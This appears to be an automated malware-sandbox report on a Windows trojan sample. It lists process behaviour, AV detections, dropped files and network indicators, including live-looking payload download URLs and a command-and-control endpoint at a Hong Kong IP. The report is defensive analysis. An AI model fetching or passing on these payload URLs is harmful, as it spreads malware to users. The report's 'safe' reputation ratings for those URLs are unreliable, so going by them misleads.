  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499702 Sample: UBONg7lmVR.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 75 44 s3-w.us-east-1.amazonaws.com 2->44 46 s3-1-w.amazonaws.com 2->46 48 5 other IPs or domains 2->48 62 Multi AV Scanner detection for submitted file 2->62 64 AI detected suspicious sample 2->64 66 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->66 9 UBONg7lmVR.exe 15 4 2->9         started        signatures3 process4 dnsIp5 52 bitbucket.org 185.166.143.48, 443, 49704 AMAZON-02US Germany 9->52 54 s3-w.us-east-1.amazonaws.com 52.216.214.209, 443, 49707 AMAZON-02US United States 9->54 40 C:\Users\user\AppData\...\tfi0ts5v.qpg.exe, PE32+ 9->40 dropped 13 tfi0ts5v.qpg.exe 3 9->13         started        file6 process7 dnsIp8 56 github.com 140.82.121.3, 443, 49721 GITHUBUS United States 13->56 58 raw.githubusercontent.com 185.199.111.133, 443, 49711, 49712 FASTLYUS Netherlands 13->58 60 httpbin.org 34.194.69.213, 443, 49724 AMAZON-AESUS United States 13->60 42 C:\Reka\rapnewsa.exe, PE32 13->42 dropped 78 Multi AV Scanner detection for dropped file 13->78 80 Suspicious powershell command line found 13->80 82 Adds a directory exclusion to Windows Defender 13->82 18 rapnewsa.exe 13->18         started        22 powershell.exe 23 13->22         started        24 powershell.exe 23 13->24         started        26 5 other processes 13->26 file9 signatures10 process11 dnsIp12 50 45.125.66.18, 443, 49723 TELE-ASTeleAsiaLimitedHK Hong Kong 18->50 68 Antivirus detection for dropped file 18->68 70 Multi AV Scanner detection for dropped file 18->70 72 Found evasive API chain (may stop execution after checking mutex) 18->72 76 3 other signatures 18->76 74 Loading BitLocker PowerShell Module 22->74 28 conhost.exe 22->28         started        30 conhost.exe 24->30         started        32 conhost.exe 26->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        38 2 other processes 26->38 signatures13 process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
UBONg7lmVR.exe3%ReversingLabsWin32.Trojan.Generic
UBONg7lmVR.exe14%VirustotalBrowse
SourceDetectionScannerLabelLink
C:\Reka\rapnewsa.exe100%AviraHEUR/AGEN.1315917
C:\Reka\rapnewsa.exe100%Joe Sandbox ML
C:\Reka\rapnewsa.exe16%ReversingLabs
C:\Reka\rapnewsa.exe24%VirustotalBrowse
C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe11%ReversingLabs
C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe8%VirustotalBrowse
No Antivirus matches
SourceDetectionScannerLabelLink
s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
bitbucket.org1%VirustotalBrowse
github.com0%VirustotalBrowse
raw.githubusercontent.com0%VirustotalBrowse
httpbin.org1%VirustotalBrowse
bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
SourceDetectionScannerLabelLink
https://httpbin.org/get0%URL Reputationsafe
https://httpbin.org/get0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://bitbucket.org0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
https://web-security-reports.services.atlassian.com/csp-report/bb-website0%Avira URL Cloudsafe
https://github.com0%Avira URL Cloudsafe
https://github.comgithubusercontent.com0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv0%Avira URL Cloudsafe
http://bitbucket.orgd0%Avira URL Cloudsafe
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%Avira URL Cloudsafe
https://web-security-reports.services.atlassian.com/csp-report/bb-website0%VirustotalBrowse
https://github.com0%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv0%Avira URL Cloudsafe
https://github.comgithubusercontent.com0%VirustotalBrowse
https://dz8aopenkvv6s.cloudfront.net0%Avira URL Cloudsafe
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe0%Avira URL Cloudsafe
http://s3-w.us-east-1.amazonaws.comd0%Avira URL Cloudsafe
http://bitbucket.org1%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe1%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.json0%Avira URL Cloudsafe
https://45.125.66.18/api/receiver/recv3%VirustotalBrowse
https://45.125.66.18:443/api/receiver/recv3%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com666666666666666666660%Avira URL Cloudsafe
http://bbuseruploads.s3.amazonaws.comd0%Avira URL Cloudsafe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
https://cdn.cookielaw.org/0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
https://aui-cdn.atlassian.com/0%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com666666666666666666660%VirustotalBrowse
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.json0%Avira URL Cloudsafe
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%Avira URL Cloudsafe
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4%VirustotalBrowse
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/0%VirustotalBrowse
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
https://aui-cdn.atlassian.com/0%VirustotalBrowse
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net0%VirustotalBrowse
https://dz8aopenkvv6s.cloudfront.net0%VirustotalBrowse
https://45.125.66.18/li0%Avira URL Cloudsafe
http://s3-w.us-east-1.amazonaws.com0%Avira URL Cloudsafe
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net0%VirustotalBrowse
https://bitbucket.org0%Avira URL Cloudsafe
https://cdn.cookielaw.org/0%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:0%Avira URL Cloudsafe
http://bbuseruploads.s3.amazonaws.com0%Avira URL Cloudsafe
http://s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe0%Avira URL Cloudsafe
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%Avira URL Cloudsafe
https://bitbucket.org1%VirustotalBrowse
http://bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
https://github.com/workhasf/kelm/raw/main/iconozave.exe0%VirustotalBrowse
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe1%VirustotalBrowse
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;0%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
s3-w.us-east-1.amazonaws.com
52.216.214.209
truefalseunknown
bitbucket.org
185.166.143.48
truefalseunknown
github.com
140.82.121.3
truefalseunknown
raw.githubusercontent.com
185.199.111.133
truefalseunknown
httpbin.org
34.194.69.213
truefalseunknown
bbuseruploads.s3.amazonaws.com
unknown
unknownfalseunknown
NameMaliciousAntivirus DetectionReputation
https://httpbin.org/getfalse
  • URL Reputation: safe
  • URL Reputation: safe
unknown
https://45.125.66.18/api/receiver/recvfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/yjsefceawd.jsonfalse
  • Avira URL Cloud: safe
unknown
https://raw.githubusercontent.com/workhasf/kelm/main/nepipirusas.jsonfalse
  • Avira URL Cloud: safe
unknown
https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exefalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
NameSourceMaliciousAntivirus DetectionReputation
https://bbuseruploads.s3.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.comtfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.comgithubusercontent.comtfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://bitbucket.orgUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-websiteUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://bitbucket.orgdUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18:443/api/receiver/recvrapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://dz8aopenkvv6s.cloudfront.netUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://s3-w.us-east-1.amazonaws.comdUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00024E000.00000004.00001000.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://bbuseruploads.s3.amazonaws.comdUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.netUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://cdn.cookielaw.org/UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://aui-cdn.atlassian.com/UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.netUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://45.125.66.18/lirapnewsa.exe, 00000014.00000002.2541747512.00000000016BB000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://s3-w.us-east-1.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://bitbucket.orgUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://github.com/workhasf/kelm/raw/main/iconozave.exeC:tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C000108000.00000004.00001000.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://bbuseruploads.s3.amazonaws.comUBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpfalse
  • 3%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
185.166.143.48
bitbucket.orgGermany
16509AMAZON-02USfalse
34.194.69.213
httpbin.orgUnited States
14618AMAZON-AESUSfalse
140.82.121.3
github.comUnited States
36459GITHUBUSfalse
52.216.214.209
s3-w.us-east-1.amazonaws.comUnited States
16509AMAZON-02USfalse
185.199.111.133
raw.githubusercontent.comNetherlands
54113FASTLYUSfalse
45.125.66.18
unknownHong Kong
133398TELE-ASTeleAsiaLimitedHKfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1499702
Start date and time:2024-08-27 12:54:16 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 9m 45s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original Sample Name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Detection:MAL
Classification:mal75.evad.winEXE@26/32@5/6
EGA Information:
  • Successful, ratio: 66.7%
HCA Information:
  • Successful, ratio: 81%
  • Number of executed functions: 219
  • Number of non-executed functions: 12
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Override analysis time to 240000 for current running targets taking high CPU consumption
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
  • Execution Graph export aborted for target tfi0ts5v.qpg.exe, PID 320 because it is empty
  • Not all processes where analyzed, report is missing behavior information
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtCreateKey calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
TimeTypeDescription
06:55:12API Interceptor10644065x Sleep call for process: UBONg7lmVR.exe modified
06:55:27API Interceptor102x Sleep call for process: powershell.exe modified
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.166.143.48Notificacon Documneto (2).vbsGet hashmaliciousUnknownBrowse
    sostener.vbsGet hashmaliciousAsyncRATBrowse
      http://bitbucket.org/WindowsAddict/microsoft-activation-scripts/raw/35e044ddc85eed60b27b37c48371bd19cdc678b7/MAS/All-In-One-Version/MAS_AIO-CRC32_8C3AA7E0.cmd%20bitbucket.orgGet hashmaliciousHTMLPhisherBrowse
        https://ronabxlax.bitbucket.io/?rvsns=c...@a...**.comGet hashmaliciousUnknownBrowse
          Aircraft PN#_Desc_&_Qty Details.vbsGet hashmaliciousUnknownBrowse
            SecuriteInfo.com.Win64.DropperX-gen.20063.4917.exeGet hashmaliciousStealcBrowse
              SecuriteInfo.com.Win32.DropperX-gen.5758.19067.exeGet hashmaliciousLummaCBrowse
                SecuriteInfo.com.Win32.DropperX-gen.4865.25795.exeGet hashmaliciousLummaCBrowse
                  SecuriteInfo.com.Win32.SpywareX-gen.21564.6215.exeGet hashmaliciousLummaCBrowse
                    SecuriteInfo.com.Win32.PWSX-gen.6833.15280.exeGet hashmaliciousLummaCBrowse
                      34.194.69.2131feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                        140.82.121.36glRBXzk6i.exeGet hashmaliciousRedLineBrowse
                        • github.com/dyrka314/Balumba/releases/download/ver2/encrypted_ImpulseCrypt_5527713376.2.exe
                        firefox.lnkGet hashmaliciousCobaltStrikeBrowse
                        • github.com/john-xor/temp/blob/main/index.html?raw=true
                        0XzeMRyE1e.exeGet hashmaliciousAmadey, VidarBrowse
                        • github.com/neiqops/ajajaj/raw/main/file_22613.exe
                        MzRn1YNrbz.exeGet hashmaliciousVidarBrowse
                        • github.com/AdobeInstal/Adobe-After-Effects-CC-2022-1.4/releases/download/123/Software.exe
                        RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                        • github.com/ssbb36/stv/raw/main/5.mp3
                        52.216.214.209eagle-runner (1).exeGet hashmaliciousXmrigBrowse
                          185.199.111.133SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                            https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                  file.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                    N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      5c683657-3d2b-5cd5-b372-9be474a3f97e.emlGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.Trojan.Siggen21.45671.28064.9687.exeGet hashmaliciousUnknownBrowse
                                          https://error--occurs--site.vercel.app/Get hashmaliciousUnknownBrowse
                                            https://q68o.giantrype.com/8BSXIBCv/Get hashmaliciousTycoon2FABrowse
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              raw.githubusercontent.com1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                                              • 185.199.109.133
                                              SecuriteInfo.com.Trojan-Downloader.Win32.Agent.xycwio.1244.6578.exeGet hashmaliciousCoinhiveBrowse
                                              • 185.199.111.133
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 185.199.108.133
                                              Neverlose.exeGet hashmaliciousXWormBrowse
                                              • 185.199.109.133
                                              N8LgG4xO0F.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              • 185.199.111.133
                                              SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                              • 185.199.108.133
                                              FlashUpdates.jsGet hashmaliciousUnknownBrowse
                                              • 185.199.109.133
                                              1U34vTVJ97.pdfGet hashmaliciousUnknownBrowse
                                              • 185.199.110.133
                                              Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
                                              • 185.199.108.133
                                              bitbucket.orgNotificacon Documneto.vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.50
                                              Notificacon Documneto (2).vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.48
                                              Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 185.166.143.50
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousAsyncRATBrowse
                                              • 185.166.143.48
                                              Crpted.vbsGet hashmaliciousUnknownBrowse
                                              • 185.166.143.49
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 185.166.143.49
                                              http://bitbucket.org/WindowsAddict/microsoft-activation-scripts/raw/35e044ddc85eed60b27b37c48371bd19cdc678b7/MAS/All-In-One-Version/MAS_AIO-CRC32_8C3AA7E0.cmd%20bitbucket.orgGet hashmaliciousHTMLPhisherBrowse
                                              • 185.166.143.50
                                              remittances.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              • 185.166.143.49
                                              github.com1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              https://github.com/angryip/ipscan/releases/download/3.9.1/ipscan-3.9.1-setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              https://slopeofhope.com/commentsys/lnk.php?u=https://haconsultores.com.mx/legend/maxwell/ldpzbsp/michaelm@umcu.org&c=E,1,A_Yp496oib_-f1w3pZp4Hud2rskHoBUUu9m1zLjByrw-OpNq6TJQE-QgWUsuKigOG1mWiTep0uj-kK8C5-LvX_Bqh-uGvKRKtcnVwRDbXNCSMFYS3grZceoYqs0,&typo=1Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.4
                                              https://energyservices.org/Get hashmaliciousHTMLPhisherBrowse
                                              • 140.82.121.3
                                              http://chengduyiwokeji-haiwai.datasink.datasjourney.comGet hashmaliciousUnknownBrowse
                                              • 140.82.121.3
                                              ep_setup.exeGet hashmaliciousUnknownBrowse
                                              • 140.82.121.4
                                              SecuriteInfo.com.Trojan-PSW.Win32.Stealer.cifv.26324.32739.exeGet hashmaliciousPhemedrone StealerBrowse
                                              • 140.82.121.3
                                              s3-w.us-east-1.amazonaws.comNotificacon Documneto.vbsGet hashmaliciousUnknownBrowse
                                              • 54.231.130.97
                                              Mi_Documento.jsGet hashmaliciousAsyncRAT, DcRatBrowse
                                              • 52.216.44.89
                                              https://github.com/massgravel/Microsoft-Activation-ScriptsGet hashmaliciousUnknownBrowse
                                              • 52.216.169.27
                                              https://pentaleon.com/?sragyzsragyzGet hashmaliciousUnknownBrowse
                                              • 3.5.16.100
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.29.127
                                              sostener.vbsGet hashmaliciousAsyncRATBrowse
                                              • 52.217.200.17
                                              sostener.vbsGet hashmaliciousRemcosBrowse
                                              • 3.5.28.42
                                              http://yathuchandran.github.io/Metamask.cloneGet hashmaliciousUnknownBrowse
                                              • 52.217.164.209
                                              http://web3linksync.pages.dev/Get hashmaliciousUnknownBrowse
                                              • 3.5.25.119
                                              https://email.mail.shpcfirm.com/c/eJxUk7uyur4CRp9Guzi5AaGwAARF9t7e8PKzcUJIJAoIgqA8_RmrM_-v_Va5Fq-qi06njHOLUYVAqpQBKEU24AwjQLhhKC4tm5BknE4VRYwzOpZTZGFKiGkwPM6mDEqk0oQrwyLCEBSbkJqJKVJBKEuxHOsphphChjGimEA0sRBOGGemaWAhCU9HFBZc55Mmq4TSz2IiHsU4n2ZtWzUj4oxwMMLBtcD9gCdKMzZRaXOXX2qEAym-p_OdW7zh0fgpleU-PKuk4XwTP-WVOJsCgbisZ1UZicMrudqnILjugcf7rh4yF1bzINM2TO51maW3f2azdXtwMl4GQGrZG0N7ivel723lLmw-4QWs3k9xrZ4CH6y_MI9k4PW9dy9uh-PBBmShV8sDOeGzPVs7dy6KLlLc29bqsZZdpKGOvYggr3yxrhHx0Aymrx59x89td7857nJv2HV4gcPO47jCj4Xrn56yQH7oM7mogYP-THjwryX0amv1l-Td6r6OeV5aLLILqxCBa77dY9T2-cqul7vNL1JZvNwm4rR3_PiMHs469F8980zf__fyRWonrMrkO1Q1zE7Cvv2hMjPmhdgmND1vAzfyz0IH-Vuud40fWDr_cS4P9pGbwzolWZ97Q1yHHvWOrhE9PzPkcX9nlgt83Gh0ur-Sn3Axd6_zUG3KXD5_X9H-aGMdtOcOz6XuhrvvoJ2Wm2WVGJvdp43vDZcIkJ_ZYJUZuxaxAodf7_1SSTy3FdbeYPImUNcRmY3LR6uVFrzVj_IrsyGwZEggYBkcAyoxAzaVFNiYMmFAiASH4yrnH_n84oKntmkxAUxKMKBcQMAVTAFPTBMzBUnC7PFzenvlWo4o_I-ijSzTS6uL_wdh2eNuiv8XAAD__xdyDpEGet hashmaliciousHTMLPhisherBrowse
                                              • 52.216.33.113
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              AMAZON-AESUShttps://aka.ms/LearnAboutSenderIdentificationGet hashmaliciousHTMLPhisherBrowse
                                              • 54.90.52.195
                                              1feP5qTCl0.exeGet hashmaliciousUnknownBrowse
                                              • 34.194.69.213
                                              Money Fellows Signatures Consent Docs#122531(Revised).pdfGet hashmaliciousUnknownBrowse
                                              • 23.22.254.206
                                              https://n3ki6w9.r.ap-northeast-2.awstrack.me/L0/https:%2F%2Fet.sp-25.com%2Fe%2Fc%2FOTizp%3FreferCode=product_OT2211aaaaaaaaaa%26shortLink=aaaaa%26longLink=H4sIAAAAAAAAAAXBWxLAEAwAwBNFCFP0Np7DhzLC_bvbzln8IvKCeQSPsM-63EoeIs2BYXW8H9_IafdYUCotqyUCW00Co8wDzmUFkhJ58qVqo35jyZFkUwAAAA==%26ecSource=OT%26referId=8725724309822211/1/010c01918f3a3e79-f24b6623-ae8f-4f46-a748-e9746a6021e2-000000/4Oo6Bk-hd_o5oOs3lBvVzZAlIjU=173Get hashmaliciousUnknownBrowse
                                              • 54.165.190.241
                                              https://indd.adobe.com/view/9cfcac35-338b-4a63-bb28-60a870b890dbGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
                                              https://we.tl/t-RErWU1YgQSGet hashmaliciousUnknownBrowse
                                              • 34.202.209.143
                                              https://wavebrowser.co/Get hashmaliciousUnknownBrowse
                                              • 3.222.199.46
                                              http://stream.crichd.vip/update/sscricket.phpGet hashmaliciousUnknownBrowse
                                              • 34.232.140.51
                                              virus total.pdfGet hashmaliciousHTMLPhisherBrowse
                                              • 23.22.254.206
